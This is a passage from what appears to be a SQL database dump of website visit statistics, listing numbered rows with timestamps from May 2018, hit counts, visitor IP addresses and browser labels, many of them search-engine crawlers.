36.149.37','other'),(248659,1526954202,1,1,0,0,'54.36.148.38','other'),(248660,1526954607,1,1,0,0,'54.36.149.101','other'),(248661,1526954895,1,1,0,0,'54.36.148.105','other'),(248662,1526955152,1,1,0,0,'178.154.171.81','other'),(248663,1526956102,1,1,0,0,'66.249.66.156','chrome'),(248664,1526956176,1,0,1,0,'66.249.66.157',''),(248665,1526956225,1,1,0,0,'54.36.149.7','other'),(248666,1526956349,1,1,0,0,'54.36.148.201','other'),(248667,1526957228,2,2,0,0,'141.8.142.74','other'),(248668,1526957231,2,2,0,0,'95.213.141.126','opera'),(248669,1526957278,2,2,0,0,'178.154.171.88','other'),(248670,1526957551,1,1,0,0,'54.36.148.192','other'),(248671,1526957838,1,1,0,0,'54.36.149.47','other'),(248672,1526957991,1,1,0,0,'54.36.148.50','other'),(248673,1526958051,1,1,0,0,'8.29.198.26','other'),(248674,1526958115,1,1,0,0,'178.154.200.41','other'),(248675,1526958220,1,1,0,0,'54.36.148.144','other'),(248676,1526958327,1,1,0,0,'54.36.148.141','other'),(248677,1526958334,1,1,0,0,'54.36.148.105','other'),(248678,1526958407,1,1,0,0,'54.36.149.87','other'),(248679,1526958591,1,1,0,0,'54.36.148.251','other'),(248680,1526958942,1,1,0,0,'54.36.148.186','other'),(248681,1526958992,1,1,0,0,'141.8.142.74','other'),(248682,1526958993,1,1,0,0,'87.250.224.46','other'),(248683,1526959093,1,0,1,0,'66.249.66.157',''),(248684,1526959095,2,2,0,0,'54.36.149.67','other'),(248685,1526959232,1,1,0,0,'54.36.148.198','other'),(248686,1526959368,1,1,0,0,'54.36.148.210','other'),(248687,1526959910,1,1,0,0,'54.36.148.242','other'),(248688,1526960397,1,1,0,0,'54.36.148.206','other'),(248689,1526960977,1,0,1,0,'66.249.66.155',''),(248690,1526961077,1,1,0,0,'54.36.149.10','other'),(248691,1526961308,1,0,1,0,'66.249.66.157',''),(248692,1526962179,2,0,2,0,'66.249.66.156',''),(248693,1526962390,1,1,0,0,'54.36.149.78','other'),(248694,1526962732,1,1,0,0,'178.92.8.253','chrome'),(248695,1526962979,1,1,0,0,'54.36.149.21','other'),(248696,1526963547,1,1,0,0,'8.29.198.25','other'),(248697,1526964379,1,1,0,0,'141.8.142.74','other'),(248698,1526964751,1,1,0,0,'54.36.148.249','other'),(248699,1526965309,1,1,0,0,'141.8.142.74','other'),(248700,1526965878,1,1,0,0,'54.36.149.24','other'),(248701,1526966127,1,1,0,0,'93.170.97.166','chrome'),(248702,1526966452,1,1,0,0,'40.77.167.56','other'),(248703,1526966866,12,12,0,0,'62.210.157.129','other'),(248704,1526967218,1,1,0,0,'54.36.148.206','other'),(248705,1526968022,1,1,0,0,'54.36.148.138','other'),(248706,1526968555,2,2,0,0,'87.250.224.46','other'),(248707,1526968651,2,2,0,0,'141.8.142.74','other'),(248708,1526968715,1,1,0,0,'91.196.178.68','firefox'),(248709,1526968813,1,1,0,0,'54.36.148.147','other'),(248710,1526968881,1,1,0,0,'8.29.198.26','other'),(248711,1526968942,1,1,0,0,'157.55.39.59','other'),(248712,1526969333,1,1,0,0,'95.132.51.114','firefox'),(248713,1526969724,1,1,0,0,'54.36.148.152','other'),(248714,1526970022,1,1,0,0,'54.36.148.107','other'),(248715,1526970274,1,1,0,0,'82.207.49.46','firefox'),(248716,1526970347,1,1,0,0,'91.196.178.135','firefox'),(248717,1526970401,2,2,0,0,'54.36.149.106','other'),(248718,1526970621,1,1,0,0,'37.9.113.182','other'),(248719,1526970973,1,0,1,0,'66.249.66.155',''),(248720,1526970991,3,3,0,0,'91.196.177.46','chrome'),(248721,1526971157,1,1,0,0,'47.96.231.74','other'),(248722,1526971567,1,1,0,0,'54.36.149.75','other'),(248723,1526971910,1,1,0,0,'54.36.148.124','other'),(248724,1526972029,2,2,0,0,'91.209.11.236','other'),(248725,1526972092,1,1,0,0,'54.36.148.226','other'),(248726,1526972161,1,1,0,0,'54.36.148.249','other'),(248727,1526972790,1,1,0,0,'91.196.179.85','other'),(248728,1526972971,1,1,0,0,'54.36.148.77','other'),(248729,1526973328,1,1,0,0,'54.36.149.9','other'),(248730,1526973451,1,1,0,0,'54.36.148.146','other'),(248731,1526973767,2,2,0,0,'130.180.218.196','chrome'),(248732,1526973809,1,1,0,0,'54.36.148.92','other'),(248733,1526974378,1,1,0,0,'8.29.198.26','other'),(248734,1526974622,2,2,0,0,'141.8.142.74','other'),(248735,1526974653,2,2,0,0,'91.196.178.76','chrome'),(248736,1526974799,1,1,0,0,'54.36.148.45','other'),(248737,1526974807,1,1,0,0,'54.36.148.92','other'),(248738,1526974958,1,1,0,0,'194.60.77.132','chrome'),(248739,1526975161,2,0,2,0,'66.249.66.157',''),(248740,1526975714,1,1,0,0,'94.178.227.197','chrome'),(248741,1526975820,1,1,0,0,'54.36.148.46','other'),(248742,1526975969,1,1,0,0,'178.154.171.88','other'),(248743,1526976317,1,1,0,0,'141.8.142.74','other'),(248744,1526976418,1,1,0,0,'54.36.148.134','other'),(248745,1526976611,1,1,0,0,'91.196.177.46','chrome'),(248746,1526976852,1,1,0,0,'91.196.178.134','chrome'),(248747,1526977404,2,2,0,0,'91.196.178.76','chrome'),(248748,1526977535,1,1,0,0,'54.36.149.54','other'),(248749,1526977758,2,2,0,0,'141.8.142.74','other'),(248750,1526977864,2,2,0,0,'91.196.178.169','chrome'),(248751,1526977966,1,1,0,0,'95.132.58.156','firefox'),(248752,1526977975,1,1,0,0,'54.36.148.219','other'),(248753,1526978410,1,1,0,0,'54.36.149.28','other'),(248754,1526978640,1,1,0,0,'216.244.66.237','other'),(248755,1526978734,1,1,0,0,'180.76.15.161','other'),(248756,1526978741,1,1,0,0,'54.36.148.205','other'),(248757,1526979027,2,2,0,0,'54.36.148.107','other'),(248758,1526979056,1,1,0,0,'54.36.149.107','other'),(248759,1526979279,2,2,0,0,'46.4.121.23','other'),(248760,1526979531,2,2,0,0,'141.8.142.74','other'),(248761,1526979592,1,1,0,0,'54.36.148.196','other'),(248762,1526979604,1,1,0,0,'91.196.178.161','chrome'),(248763,1526979714,1,1,0,0,'8.29.198.27','other'),(248764,1526979810,1,1,0,0,'54.36.149.61','other'),(248765,1526980091,1,1,0,0,'216.244.66.237','other'),(248766,1526980421,2,0,2,0,'66.249.66.74',''),(248767,1526980434,1,1,0,0,'66.249.66.74','chrome'),(248768,1526980438,1,1,0,0,'66.249.66.157','chrome'),(248769,1526980482,1,1,0,0,'178.154.171.88','other'),(248770,1526980518,2,2,0,0,'91.196.178.28','chrome'),(248771,1526980589,1,1,0,0,'54.36.149.92','other'),(248772,1526980627,1,1,0,0,'54.36.148.69','other'),(248773,1526980685,1,1,0,0,'107.167.104.99','other'),(248774,1526980835,1,1,0,0,'54.36.148.176','other'),(248775,1526980923,1,1,0,0,'54.36.149.49','other'),(248776,1526981038,1,1,0,0,'217.69.133.3','other'),(248777,1526981145,2,2,0,0,'216.244.66.237','other'),(248778,1526981155,1,1,0,0,'66.102.9.40','chrome'),(248779,1526981158,1,1,0,0,'54.36.148.120','other'),(248780,1526981408,1,0,1,0,'66.249.66.157',''),(248781,1526981458,1,1,0,0,'54.36.149.91','other'),(248782,1526981647,1,1,0,0,'54.36.149.53','other'),(248783,1526981735,1,1,0,0,'37.9.113.115','other'),(248784,1526981830,1,1,0,0,'207.46.13.139','other'),(248785,1526981927,1,1,0,0,'54.36.149.52','other'),(248786,1526982144,1,1,0,0,'216.244.66.237','other'),(248787,1526982174,1,1,0,0,'54.36.148.91','other'),(248788,1526982207,2,2,0,0,'193.19.152.14','chrome'),(248789,1526982265,1,1,0,0,'62.205.134.182','other'),(248790,1526982487,1,1,0,0,'157.55.39.59','other'),(248791,1526982849,1,0,1,0,'66.249.66.157',''),(248792,1526982957,1,1,0,0,'80.70.72.73','chrome'),(248793,1526983433,1,1,0,0,'141.8.142.74','other'),(248794,1526983835,1,1,0,0,'216.244.66.237','other'),(248795,1526983886,2,2,0,0,'54.36.148.166','other'),(248796,1526983930,1,1,0,0,'66.102.9.35','chrome'),(248797,1526984254,1,1,0,0,'91.196.178.102','chrome'),(248798,1526984377,1,1,0,0,'54.36.149.90','other'),(248799,1526984728,1,1,0,0,'54.36.149.54','other'),(248800,1526984881,1,1,0,0,'54.36.148.75','other'),(248801,1526984940,1,1,0,0,'193.19.152.14','chrome'),(248802,1526985213,1,1,0,0,'8.29.198.25','other'),(248803,1526985408,2,2,0,0,'157.55.39.59','other'),(248804,1526985581,2,2,0,0,'54.36.149.50','other'),(248805,1526985647,1,1,0,0,'93.170.97.166','chrome'),(248806,1526985908,1,1,0,0,'178.154.171.88','other'),(248807,1526986174,2,2,0,0,'130.180.218.196','chrome'),(248808,1526986176,1,1,0,0,'54.36.148.39','other'),(248809,1526986716,1,0,1,0,'66.249.66.156',''),(248810,1526986780,1,1,0,0,'54.36.149.5','other'),(248811,1526986904,1,1,0,0,'54.36.148.80','other'),(248812,1526986962,1,1,0,0,'87.250.224.46','other'),(248813,1526987941,1,1,0,0,'141.8.142.74','other'),(248814,1526988209,1,1,0,0,'54.36.149.97','other'),(248815,1526988811,1,1,0,0,'54.36.148.212','other'),(248816,1526988939,1,1,0,0,'54.36.148.126','other'),(248817,1526989085,1,1,0,0,'54.36.149.35','other'),(248818,1526989135,1,1,0,0,'54.36.148.121','other'),(248819,1526989189,1,1,0,0,'54.36.149.78','other'),(248820,1526989270,1,1,0,0,'54.36.148.136','other'),(248821,1526989301,1,1,0,0,'54.36.148.117','other'),(248822,1526989304,3,3,0,0,'91.196.178.76','chrome'),(248823,1526989312,2,2,0,0,'91.196.178.68','firefox'),(248824,1526989317,1,1,0,0,'54.36.148.73','other'),(248825,1526989456,1,1,0,0,'91.196.178.89','firefox'),(248826,1526989514,1,1,0,0,'54.36.148.218','other'),(248827,1526989543,1,1,0,0,'54.36.148.58','other'),(248828,1526989854,1,1,0,0,'54.36.148.181','other'),(248829,1526989981,1,1,0,0,'46.211.133.102','chrome'),(248830,1526990263,1,1,0,0,'54.36.149.40','other'),(248831,1526990326,2,2,0,0,'91.196.178.68','firefox'),(248832,1526990489,1,1,0,0,'54.36.148.162','other'),(248833,1526990540,1,1,0,0,'8.29.198.26','other'),(248834,1526990843,2,2,0,0,'91.196.178.76','chrome'),(248835,1526990988,1,1,0,0,'178.92.170.95','chrome'),(248836,1526991128,1,1,0,0,'54.36.148.76','other'),(248837,1526991153,2,2,0,0,'130.180.218.196','chrome'),(248838,1526991297,1,1,0,0,'54.36.149.41','other'),(248839,1526991466,1,1,0,0,'91.124.85.183','firefox'),(248840,1526991844,1,1,0,0,'54.36.149.62','other'),(248841,1526992492,2,2,0,0,'91.196.177.46','chrome'),(248842,1526992746,1,1,0,0,'54.36.149.36','other'),(248843,1526992949,1,1,0,0,'54.36.148.106','other'),(248844,1526993107,1,1,0,0,'54.36.148.47','other'),(248845,1526993214,2,2,0,0,'91.196.178.76','chrome'),(248846,1526993310,1,0,1,0,'66.249.64.28',''),(248847,1526993363,1,1,0,0,'54.36.149.66','other'),(248848,1526993514,2,2,0,0,'94.23.200.86','other'),(248849,1526993523,1,1,0,0,'54.36.148.255','other'),(248850,1526993761,1,0,1,0,'66.249.64.29',''),(248851,1526993804,1,1,0,0,'54.36.148.46','other'),(248852,1526993846,1,1,0,0,'54.36.148.17','other'),(248853,1526993925,1,1,0,0,'54.36.148.185','other'),(248854,1526994050,1,1,0,0,'162.210.196.130','other'),(248855,1526994138,1,1,0,0,'178.154.171.88','other'),(248856,1526994139,2,2,0,0,'91.196.178.76','chrome'),(248857,1526994274,1,1,0,0,'141.8.142.74','other'),(248858,1526994367,2,2,0,0,'92.113.55.83','msie'),(248859,1526994384,1,1,0,0,'54.36.149.61','other'),(248860,1526994412,2,2,0,0,'91.196.178.28','chrome'),(248861,1526994442,3,3,0,0,'37.54.114.62','chrome'),(248862,1526994533,1,1,0,0,'54.36.148.105','other'),(248863,1526995002,1,0,1,0,'66.249.64.28',''),(248864,1526995079,1,1,0,0,'66.249.64.30','chrome'),(248865,1526995218,1,1,0,0,'95.132.58.156','firefox'),(248866,1526995296,1,1,0,0,'93.175.236.51','chrome'),(248867,1526995411,2,2,0,0,'91.196.178.161','chrome'),(248868,1526995536,1,1,0,0,'54.36.148.55','other'),(248869,1526996052,1,1,0,0,'8.29.198.27','other'),(248870,1526996648,2,2,0,0,'91.196.178.76','chrome'),(248871,1526997008,1,1,0,0,'178.94.216.47','chrome'),(248872,1526997079,1,1,0,0,'91.196.178.93','firefox'),(248873,1526997305,2,2,0,0,'91.196.178.66','chrome'),(248874,1526997553,1,1,0,0,'91.196.178.135','firefox'),(248875,1526997596,1,1,0,0,'141.8.142.74','other'),(248876,1526997788,1,1,0,0,'54.36.149.91','other'),(248877,1526998037,2,2,0,0,'91.196.178.76','chrome'),(248878,1526998114,1,1,0,0,'54.36.149.81','other'),(248879,1526998229,1,1,0,0,'95.132.35.144','chrome'),(248880,1526998575,1,1,0,0,'142.4.200.37','other'),(248881,1526998876,2,2,0,0,'193.19.152.14','chrome'),(248882,1526998895,1,1,0,0,'54.36.148.106','other'),(248883,1526999197,1,0,1,0,'66.249.64.29',''),(248884,1526999797,1,1,0,0,'54.36.148.198','other'),(248885,1527000396,1,1,0,0,'141.8.142.74','other'),(248886,1527000590,1,1,0,0,'54.36.149.68','other'),(248887,1527000721,1,1,0,0,'54.36.148.200','other'),(248888,1527000854,1,1,0,0,'54.36.149.102','other'),(248889,1527001017,1,1,0,0,'62.210.101.104','other'),(248890,1527001020,1,1,0,0,'178.95.92.13','chrome'),(248891,1527001078,1,1,0,0,'54.36.148.150','other'),(248892,1527001233,1,1,0,0,'54.165.59.7','other'),(248893,1527001323,1,1,0,0,'107.167.116.62','other'),(248894,1527001377,1,1,0,0,'8.29.198.27','other'),(248895,1527001386,1,1,0,0,'54.36.148.167','other'),(248896,1527001405,1,1,0,0,'54.36.149.29','other'),(248897,1527001806,1,1,0,0,'54.36.148.243','other'),(248898,1527002065,1,1,0,0,'66.249.64.30','chrome'),(248899,1527002436,1,0,1,0,'66.249.64.29',''),(248900,1527002599,1,1,0,0,'37.190.160.21','chrome'),(248901,1527002839,1,0,1,0,'66.249.70.25',''),(248902,1527002887,1,1,0,0,'54.36.149.63','other'),(248903,1527003056,1,1,0,0,'216.244.66.237','other'),(248904,1527003145,1,1,0,0,'54.36.148.207','other'),(248905,1527003240,1,1,0,0,'54.36.148.73','other'),(248906,1527003306,2,2,0,0,'141.8.142.74','other'),(248907,1527003342,1,1,0,0,'54.36.148.114','other'),(248908,1527004145,1,1,0,0,'188.230.43.254','other'),(248909,1527004644,1,1,0,0,'157.55.39.170','other'),(248910,1527005572,1,1,0,0,'54.36.148.35','other'),(248911,1527006025,1,0,1,0,'66.249.70.27',''),(248912,1527006067,1,1,0,0,'54.36.148.219','other'),(248913,1527006440,1,0,1,0,'66.249.64.29',''),(248914,1527006495,1,1,0,0,'188.230.43.254','other'),(248915,1527006741,1,1,0,0,'54.36.149.79','other'),(248916,1527006861,1,1,0,0,'91.196.178.72','firefox'),(248917,1527006884,1,1,0,0,'8.29.198.27','other'),(248918,1527006987,1,1,0,0,'54.36.149.55','other'),(248919,1527007182,1,0,1,0,'66.249.64.28',''),(248920,1527007489,1,1,0,0,'141.8.142.74','other'),(248921,1527007502,1,0,1,0,'66.249.64.29',''),(248922,1527007719,1,1,0,0,'54.36.149.28','other'),(248923,1527008119,1,1,0,0,'54.36.148.148','other'),(248924,1527008256,1,1,0,0,'54.36.148.201','other'),(248925,1527008637,1,1,0,0,'91.196.178.134','chrome'),(248926,1527009403,2,2,0,0,'173.208.157.186','other'),(248927,1527009406,1,1,0,0,'54.36.148.40','other'),(248928,1527009487,1,0,1,0,'66.249.70.29',''),(248929,1527009546,1,1,0,0,'54.36.148.64','other'),(248930,1527009642,1,1,0,0,'95.135.97.80','chrome'),(248931,1527009771,1,1,0,0,'54.36.148.15','other'),(248932,1527009784,1,1,0,0,'95.216.14.234','other'),(248933,1527010188,1,1,0,0,'54.36.148.144','other'),(248934,1527010629,1,1,0,0,'86.110.117.10','chrome'),(248935,1527010897,2,2,0,0,'37.55.224.135','chrome'),(248936,1527010968,1,1,0,0,'54.36.149.55','other'),(248937,1527011241,1,0,1,0,'66.249.64.29',''),(248938,1527011415,1,1,0,0,'157.55.39.170','other'),(248939,1527011632,1,1,0,0,'141.8.142.74','other'),(248940,1527011857,1,1,0,0,'54.36.148.117','other'),(248941,1527011924,1,1,0,0,'91.196.178.80','chrome'),(248942,1527012045,1,1,0,0,'54.36.149.105','other'),(248943,1527012138,1,1,0,0,'54.36.148.97','other'),(248944,1527012219,1,1,0,0,'8.29.198.27','other'),(248945,1527012359,1,1,0,0,'54.36.148.56','other'),(248946,1527012567,1,1,0,0,'193.106.30.99','firefox'),(248947,1527012845,2,2,0,0,'91.196.178.164','chrome'),(248948,1527013181,2,2,0,0,'141.8.142.74','other'),(248949,1527013399,1,1,0,0,'54.36.149.74','other'),(248950,1527013916,1,1,0,0,'54.36.149.31','other'),(248951,1527014489,1,1,0,0,'217.69.133.3','other'),(248952,1527014785,1,1,0,0,'54.36.149.82','other'),(248953,1527014787,1,1,0,0,'54.36.148.114','other'),(248954,1527015204,1,1,0,0,'54.36.148.13','other'),(248955,1527015381,1,1,0,0,'188.93.56.216','firefox'),(248956,1527015393,1,1,0,0,'141.8.142.74','other'),(248957,1527015696,1,0,1,0,'66.249.64.28',''),(248958,1527016251,2,2,0,0,'178.154.171.88','other'),(248959,1527016258,1,1,0,0,'54.36.148.58','other'),(248960,1527016623,1,1,0,0,'54.36.148.100','other'),(248961,1527016935,2,2,0,0,'54.36.148.216','other'),(248962,1527017717,1,1,0,0,'8.29.198.27','other'),(248963,1527017786,1,0,1,0,'66.249.64.28',''),(248964,1527017796,1,1,0,0,'66.249.64.28','chrome'),(248965,1527017803,1,1,0,0,'66.249.70.27','chrome'),(248966,1527018136,1,1,0,0,'54.36.149.25','other'),(248967,1527018300,1,1,0,0,'54.36.148.46','other'),(248968,1527018423,1,1,0,0,'178.154.171.88','other'),(248969,1527018582,1,1,0,0,'54.36.149.50','other'),(248970,1527018620,1,1,0,0,'141.8.142.74','other'),(248971,1527018782,1,1,0,0,'54.36.148.165','other'),(248972,1527018981,1,1,0,0,'37.73.9.108','other'),(248973,1527019080,1,0,1,0,'66.249.64.28',''),(248974,1527019895,1,1,0,0,'54.36.148.78','other'),(248975,1527020382,1,1,0,0,'37.9.113.182','other'),(248976,1527020388,1,1,0,0,'95.132.48.75','chrome'),(248977,1527020768,1,1,0,0,'93.127.117.221','chrome'),(248978,1527020935,1,1,0,0,'54.36.149.73','other'),(248979,1527021245,1,1,0,0,'54.36.148.185','other'),(248980,1527021631,1,1,0,0,'66.249.70.25','chrome'),(248981,1527021657,1,1,0,0,'13.56.232.243','chrome'),(248982,1527021709,1,1,0,0,'54.36.149.76','other'),(248983,1527022065,1,1,0,0,'54.36.149.69','other'),(248984,1527022101,1,0,1,0,'66.249.64.29',''),(248985,1527022614,2,0,2,0,'66.249.64.30',''),(248986,1527022782,1,1,0,0,'54.36.148.57','other'),(248987,1527022852,1,1,0,0,'54.36.149.54','other'),(248988,1527022883,1,1,0,0,'54.36.148.63','other'),(248989,1527022886,1,1,0,0,'54.36.148.75','other'),(248990,1527022903,1,1,0,0,'54.36.148.202','other'),(248991,1527023062,1,1,0,0,'8.29.198.26','other'),(248992,1527023340,1,1,0,0,'54.36.148.185','other'),(248993,1527023418,1,1,0,0,'178.154.171.88','other'),(248994,1527023741,1,1,0,0,'54.36.148.97','other'),(248995,1527023794,1,1,0,0,'54.36.148.251','other'),(248996,1527023986,1,1,0,0,'54.36.148.13','other'),(248997,1527024377,1,1,0,0,'54.36.148.204','other'),(248998,1527024533,1,1,0,0,'54.36.148.30','other'),(248999,1527024776,1,1,0,0,'141.8.142.74','other'),(249000,1527025291,1,1,0,0,'216.244.66.237','other'),(249001,1527025873,1,1,0,0,'141.8.142.74','other'),(249002,1527025985,1,1,0,0,'54.36.149.86','other'),(249003,1527026023,1,1,0,0,'54.36.149.77','other'),(249004,1527026116,1,1,0,0,'54.36.149.31','other'),(249005,1527026474,2,0,2,0,'66.249.64.29',''),(249006,1527026652,1,1,0,0,'54.36.148.10','other'),(249007,1527026682,1,1,0,0,'213.180.203.8','other'),(249008,1527026790,1,1,0,0,'141.8.142.74','other'),(249009,1527026902,1,1,0,0,'40.77.167.98','other'),(249010,1527027228,1,1,0,0,'54.36.149.20','other'),(249011,1527027790,1,1,0,0,'54.36.149.72','other'),(249012,1527027791,1,1,0,0,'54.36.148.89','other'),(249013,1527028543,1,1,0,0,'8.29.198.25','other'),(249014,1527029099,1,1,0,0,'54.36.148.109','other'),(249015,1527029261,1,0,1,0,'66.249.64.30',''),(249016,1527029438,1,1,0,0,'40.77.167.174','other'),(249017,1527029629,1,1,0,0,'178.154.171.88','other'),(249018,1527030091,1,1,0,0,'66.249.64.30','chrome'),(249019,1527030960,1,1,0,0,'54.36.148.224','other'),(249020,1527031073,1,1,0,0,'157.55.39.134','other'),(249021,1527031384,1,0,1,0,'66.249.64.29',''),(249022,1527031413,1,1,0,0,'54.36.149.27','other'),(249023,1527031519,1,1,0,0,'54.36.149.4','other'),(249024,1527032121,1,0,1,0,'66.249.64.28',''),(249025,1527032565,1,1,0,0,'141.8.142.74','other'),(249026,1527032727,2,2,0,0,'216.244.66.237','other'),(249027,1527033032,1,0,1,0,'66.249.70.29',''),(249028,1527033899,1,1,0,0,'8.29.198.27','other'),(249029,1527034077,1,1,0,0,'141.8.142.74','other'),(249030,1527035710,1,1,0,0,'157.55.39.134','other'),(249031,1527036103,1,0,1,0,'66.249.64.28',''),(249032,1527036564,1,1,0,0,'47.96.234.252','other'),(249033,1527037085,1,1,0,0,'157.55.39.134','other'),(249034,1527037238,1,0,1,0,'66.249.64.28',''),(249035,1527037271,1,1,0,0,'54.36.149.77','other'),(249036,1527037552,1,1,0,0,'217.69.133.4','other'),(249037,1527037582,1,0,1,0,'66.249.64.29',''),(249038,1527037962,1,1,0,0,'54.36.148.38','other'),(249039,1527038051,1,1,0,0,'54.36.149.10','other'),(249040,1527038260,1,1,0,0,'66.249.70.29','chrome'),(249041,1527038303,1,1,0,0,'216.244.66.237','other'),(249042,1527038883,1,1,0,0,'54.36.149.66','other'),(249043,1527038944,23,23,0,0,'142.44.159.96','other'),(249044,1527039363,1,1,0,0,'54.165.59.7','other'),(249045,1527039380,1,1,0,0,'8.29.198.27','other'),(249046,1527039438,1,1,0,0,'54.36.148.82','other'),(249047,1527039624,1,1,0,0,'66.249.64.28','chrome'),(249048,1527040511,1,1,0,0,'54.36.148.72','other'),(249049,1527040832,1,0,1,0,'66.249.64.30',''),(249050,1527040920,1,1,0,0,'54.36.149.78','other'),(249051,1527042219,1,1,0,0,'54.36.148.152','other'),(249052,1527042485,1,1,0,0,'141.8.142.74','other'),(249053,1527042528,1,1,0,0,'54.36.149.73','other'),(249054,1527042886,1,0,1,0,'66.249.70.25',''),(249055,1527043042,1,1,0,0,'54.36.149.100','other'),(249056,1527043143,1,1,0,0,'54.36.148.94','other'),(249057,1527043161,1,1,0,0,'54.36.148.100','other'),(249058,1527043281,1,1,0,0,'54.36.148.89','other'),(249059,1527043315,1,1,0,0,'54.36.148.108','other'),(249060,1527043443,1,1,0,0,'54.36.149.83','other'),(249061,1527043561,1,1,0,0,'54.36.148.163','other'),(249062,1527044008,1,1,0,0,'54.36.149.103','other'),(249063,1527044051,1,1,0,0,'54.36.148.114','other'),(249064,1527044381,1,1,0,0,'66.249.64.28','chrome'),(249065,1527044531,1,1,0,0,'54.36.148.128','other'),(249066,1527044725,1,1,0,0,'8.29.198.25','other'),(249067,1527044863,1,1,0,0,'54.36.149.91','other'),(249068,1527044874,1,1,0,0,'54.36.148.180','other'),(249069,1527045120,1,1,0,0,'216.244.66.237','other'),(249070,1527045177,47,47,0,0,'95.216.5.212','other'),(249071,1527045202,1,1,0,0,'54.36.148.25','other'),(249072,1527045454,1,1,0,0,'178.154.171.88','other'),(249073,1527045467,1,1,0,0,'54.36.149.86','other'),(249074,1527045470,1,1,0,0,'46.161.9.39','chrome'),(249075,1527045746,1,1,0,0,'54.36.149.104','other'),(249076,1527045747,1,1,0,0,'54.36.148.105','other'),(249077,1527045759,1,1,0,0,'54.36.148.160','other'),(249078,1527045834,1,1,0,0,'54.36.148.138','other'),(249079,1527045898,1,1,0,0,'37.9.113.182','other'),(249080,1527046052,1,1,0,0,'54.36.148.103','other'),(249081,1527046067,1,1,0,0,'54.36.149.83','other'),(249082,1527046288,1,1,0,0,'216.244.66.237','other'),(249083,1527046421,1,1,0,0,'54.36.148.129','other'),(249084,1527046887,1,1,0,0,'54.36.148.163','other'),(249085,1527046964,1,1,0,0,'54.36.148.217','other'),(249086,1527047017,1,1,0,0,'54.36.149.92','other'),(249087,1527047147,3,3,0,0,'46.71.128.190','firefox'),(249088,1527047323,1,1,0,0,'54.36.148.224','other'),(249089,1527047715,1,1,0,0,'54.36.149.31','other'),(249090,1527048186,1,1,0,0,'193.106.30.99','firefox'),(249091,1527048674,1,1,0,0,'54.36.148.144','other'),(249092,1527049298,1,1,0,0,'54.36.148.91','other'),(249093,1527049354,1,1,0,0,'141.8.142.74','other'),(249094,1527049396,1,1,0,0,'54.36.148.174','other'),(249095,1527049467,1,1,0,0,'216.244.66.237','other'),(249096,1527049770,1,0,1,0,'66.249.64.30',''),(249097,1527049869,1,1,0,0,'54.36.148.17','other'),(249098,1527050061,1,1,0,0,'54.36.149.0','other'),(249099,1527050212,1,1,0,0,'8.29.198.27','other'),(249100,1527050383,1,1,0,0,'54.36.149.63','other'),(249101,1527050585,1,1,0,0,'54.36.149.86','other'),(249102,1527050637,1,1,0,0,'54.36.149.90','other'),(249103,1527050656,1,1,0,0,'54.36.148.208','other'),(249104,1527050723,1,1,0,0,'54.36.149.58','other'),(249105,1527051789,1,1,0,0,'54.36.148.200','other'),(249106,1527051889,1,0,1,0,'66.249.70.29',''),(249107,1527052336,1,1,0,0,'54.36.148.86','other'),(249108,1527052525,1,1,0,0,'54.36.148.81','other'),(249109,1527052529,1,1,0,0,'54.36.149.39','other'),(249110,1527052546,2,2,0,0,'91.196.178.161','chrome'),(249111,1527052769,1,1,0,0,'77.111.244.55','chrome'),(249112,1527053008,1,1,0,0,'216.244.66.237','other'),(249113,1527053421,1,1,0,0,'54.36.149.98','other'),(249114,1527053713,1,1,0,0,'54.36.148.201','other'),(249115,1527053996,1,1,0,0,'54.36.148.96','other'),(249116,1527054135,1,1,0,0,'212.3.125.234','chrome'),(249117,1527054229,1,1,0,0,'217.69.133.223','other'),(249118,1527054413,1,1,0,0,'91.196.178.84','firefox'),(249119,1527054629,3,3,0,0,'91.196.178.76','chrome'),(249120,1527054709,1,1,0,0,'66.249.70.27','chrome'),(249121,1527054857,1,1,0,0,'66.249.64.28','chrome'),(249122,1527055180,1,1,0,0,'54.36.149.71','other'),(249123,1527055374,3,3,0,0,'141.8.142.74','other'),(249124,1527055540,1,1,0,0,'54.36.148.53','other'),(249125,1527055558,1,1,0,0,'8.29.198.25','other'),(249126,1527055835,1,1,0,0,'95.132.58.156','firefox'),(249127,1527055846,3,3,0,0,'91.196.177.46','chrome'),(249128,1527056068,1,1,0,0,'54.36.149.36','other'),(249129,1527056216,1,1,0,0,'178.154.171.88','other'),(249130,1527056645,1,1,0,0,'94.45.144.186','chrome'),(249131,1527056863,1,1,0,0,'54.36.148.42','other'),(249132,1527056948,1,1,0,0,'54.36.148.152','other'),(249133,1527057034,1,1,0,0,'54.36.148.161','other'),(249134,1527057187,1,1,0,0,'54.36.149.41','other'),(249135,1527057486,2,2,0,0,'178.154.171.88','other'),(249136,1527057527,1,1,0,0,'37.9.113.182','other'),(249137,1527057810,2,2,0,0,'91.196.178.76','chrome'),(249138,1527058039,1,1,0,0,'54.36.148.98','other'),(249139,1527058216,1,1,0,0,'66.249.64.28','chrome'),(249140,1527058458,1,1,0,0,'31.43.233.247','firefox'),(249141,1527058648,1,1,0,0,'54.36.149.91','other'),(249142,1527059054,1,1,0,0,'54.36.148.218','other'),(249143,1527059438,1,1,0,0,'54.36.148.27','other'),(249144,1527059634,1,1,0,0,'178.154.200.41','other'),(249145,1527059635,1,1,0,0,'178.154.171.88','other'),(249146,1527060110,1,1,0,0,'23.253.82.146','firefox'),(249147,1527060532,1,1,0,0,'54.36.148.142','other'),(249148,1527060569,1,1,0,0,'54.36.148.26','other'),(249149,1527060921,1,1,0,0,'82.207.49.46','firefox'),(249150,1527061045,1,1,0,0,'8.29.198.27','other'),(249151,1527061285,1,1,0,0,'54.36.148.240','other'),(249152,1527061872,1,1,0,0,'54.36.148.151','other'),(249153,1527062021,1,1,0,0,'37.53.205.21','chrome'),(249154,1527062182,1,1,0,0,'54.36.148.37','other'),(249155,1527062399,1,1,0,0,'54.36.149.21','other'),(249156,1527062541,1,1,0,0,'141.8.142.74','other'),(249157,1527062607,1,1,0,0,'54.36.148.198','other'),(249158,1527062768,1,1,0,0,'216.244.66.237','other'),(249159,1527062771,2,2,0,0,'91.196.178.84','firefox'),(249160,1527062775,1,1,0,0,'37.9.113.182','other'),(249161,1527062854,1,1,0,0,'66.249.70.25','chrome'),(249162,1527063014,1,1,0,0,'195.3.134.100','chrome'),(249163,1527063111,1,1,0,0,'54.36.148.118','other'),(249164,1527063199,1,1,0,0,'54.36.148.144','other'),(249165,1527063939,1,1,0,0,'54.36.148.12','other'),(249166,1527064031,1,1,0,0,'54.36.149.34','other'),(249167,1527064702,1,0,1,0,'66.249.70.25',''),(249168,1527064922,1,1,0,0,'141.8.142.74','other'),(249169,1527065107,1,0,1,0,'66.249.64.28',''),(249170,1527065145,1,1,0